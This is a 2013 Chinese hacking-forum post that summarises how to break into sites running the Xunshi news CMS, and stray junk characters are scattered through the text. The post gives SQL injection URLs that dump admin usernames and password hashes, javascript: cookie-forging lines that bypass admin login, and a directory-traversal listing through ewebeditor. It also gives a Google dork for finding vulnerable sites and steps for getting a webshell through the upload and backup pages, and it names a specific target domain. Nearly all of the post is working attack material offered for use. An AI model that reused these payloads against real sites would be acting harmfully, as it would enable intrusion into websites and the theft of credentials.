找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2868|回复: 0
打印 上一主题 下一主题

讯时漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-16 21:25:50 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
by:血封忆尘
9 l" j$ K% c& I- l+ [" x! z6 \# Y5 \1 F! V( Z
在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)9 W8 h& E6 n4 Y7 b6 z2 |" B

/ p8 R1 l. U* o6 U) h以下本文总结来自黑防去年第9期杂志上的内容...( k/ v% b2 ]; W
# J1 [& K: W3 J- @
先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%& P# [: o+ m% T& l7 |, a
% E. J8 s* y' Z- d; Y
26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2 * _4 j% b" b7 I4 O1 T# g& J% w
4 C  u2 O# Q" U" `! I
记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况
, q6 z4 C, a% k' j这里一个注入
, h- G# H6 X) c8 F1 E, b+ C
2 N! d! v( B: b- v) L1 u6 A2 J效果如图:
! R; V' C. Z1 U0 i- I* v5 X8 e, c  C8 A- ^

! [* n  G6 C, }3 t/ z$ P5 z" _$ I- ~2 ]  ]
这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.' p6 q; h/ A3 P- r7 B+ }. ~4 K

& S/ v6 L0 e7 r! P/ o密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去
+ v# q% ]% _6 [
! t, `2 z2 r* I* ^% i8 yjavascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));
5 f- ^7 h/ `# @7 y+ ?5 m+ G9 n; G: i0 x1 \
那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:, ^% ?  l( ^. g

; Q' e2 l7 e9 b3 g- I因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞
% S/ E5 |* S, o1 [9 t; V
9 y" i  H8 d& V" }它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以& }, h/ g% A2 F3 Y7 G7 ?) ~3 T$ e* U
. o9 n8 r1 @6 m" X. p# L
访问这页面来列目录..步骤如下:
% `, E6 m2 c* ]% H- a9 e; `5 L6 l/ L' ^  z
javascript:alert(document.cookie="admindj=1") / P2 ]  i, k) O$ l* C$ v/ Q
% p, ^8 T; }( G1 N1 y
http://www.political-security.co ... asp?id=46&dir=../..  R; V. D% e( I6 O/ U) l
: d6 y8 X( q' Q. L9 v4 o
效果如图:2 O2 P0 P" ~. E; T1 r: l# J
0 l8 ^" h5 e6 w4 p/ W8 l

! R7 n5 p/ r9 E7 }2 I  x+ T; ~2 N9 C. C) m
这样全站目录都能瞧了..找到后台目录..进去..
, f; L) O9 }$ q  B( Z% m8 o0 m, X% @4 r% R1 S5 R
那么进了后台怎么拿shell??上传--备份就ok了..
' n; U( h- E; X' x% ^* S) v: q* p& Y; P! A7 y4 q7 H( Q( a
那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..' U2 P4 T0 k# [, f" P/ O+ i1 `

& q) h7 w8 _+ b  u+ x  T这个我也碰到过一次..你都可以通过列目录来实现..' H: S  x4 y& [2 b& ?0 e- t
9 k7 t* W" p+ t9 `9 {  p; E6 w2 d
javascript:alert(document.cookie="admindj=1")
6 T/ M, H8 Q- C4 K( L$ j) }
; w6 Y4 r0 `" \+ ~* zhttp://www.political-security.co ... p?action=BackupData   {( Z3 N: d$ b& e
5 }, @1 P) z3 X" B% }
备份ok..
: B: K, D8 d' R% K- N' S
, C- H+ l' T8 o0 ^4 c; ^1 x那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?$ f2 P4 v5 y' J/ F/ \' C! u# ?

7 L' d9 |1 {# b4 ^/ z) C. D在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下8 S. W6 K+ t2 R7 `8 u* g( _6 K. P
/ Y5 T& B- K# F, c) m7 o' w, M& J8 o
然后访问此页面进行注入..步骤如下:
- X. w! V2 G8 R( }7 ^
" s7 @* `* q7 |) ?javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")5 _% `9 }7 J% @$ V- G
' u" l7 x) o( ~( J4 V* k) p
然后请求admin/admin_chk.asp页面( `; B; S& @" a+ i/ n/ H) Q' O- b
5 P4 `" o. B9 L2 [8 Q4 S& W
输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%
  z) n: Q# X( N7 I% t7 N
/ f3 o+ l8 j' S) x+ s6 l9 Q26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
9 r* K; T% i. {" k" f; ~! u5 `1 m+ `3 R0 J! U
效果如图所示:
  Z+ {$ f# H" q3 b) |% L# z# m
6 y( r% C7 Q4 A   W; \8 d7 y& _" Z* c& Y- b* Y

% o& g; c$ O$ Y! S6 d& x讯时漏洞2. ^. D( K8 W5 }% d1 y: K
google关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)
1 D4 g3 p+ j3 r3 Y* @# u 5 ]0 R- D6 L6 |4 f
1、/admin/admin_news_pl_view.asp?id=1
; k! ]8 i7 b6 ]! X  }' x//id任意 填入以下语句
3 z1 f+ |! c3 n& b % U4 ?0 w' z/ D# b" p5 p8 [
2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!
; Q2 i5 M# e% Q+ o% l) b
! i& F+ u" R* O* O( L* k# N2 N* n2 |2 L; k/ {
+ r; r+ r0 g5 p- {2 {- L& o- w
3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='% R. J$ O, Y1 h9 {2 u. d
: w8 D* c. a6 u" k( J6 r  q! i
  W1 {) I. E- _* K; z
* m) [) E0 |1 K9 u' y* u- l0 L
爆出管理员帐号和密码了9 b, `8 Y7 Z; e3 ?0 d' ~
- M3 u8 U. f4 @1 X
3 {! Y& G" U1 q

4 D9 b5 L) y+ u4、cookies进后台
& l" m7 n6 f# I2 A0 t5 G & f4 A7 t. B% r) U
javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));
, {& d4 e% ^( J! j# g  Y
2 Z- m7 a4 j8 O( n+ ^6 z: x6 x$ X  u" s% H; v
4 h6 I. \0 O+ h5 R6 s3 g
5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!6 {3 s! `6 o8 |

- O8 U! s3 O: M9 a5 y6 r& _7 B6 g' l: @# F7 b
8 l& b. V2 f) x! K. e3 {* M+ K) u% D
6、后台有上传和备份取SHELL不难。* i$ m: v) I* D" `) @9 B9 P

2 w) Q( B" |& S; w/ i/ m7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..
2 I9 v+ i. M: x  m2 f, r 9 x7 k) L" g4 ~1 T7 O! u' {$ U
逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!* n: A+ S8 K" J4 w1 H% c& ^* V

. |/ n+ q# Z* }$ B. m5 T* _" ~! w7 A6 U

# B! b; |& e  M+ G% n: V2 ~+ Y" k
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表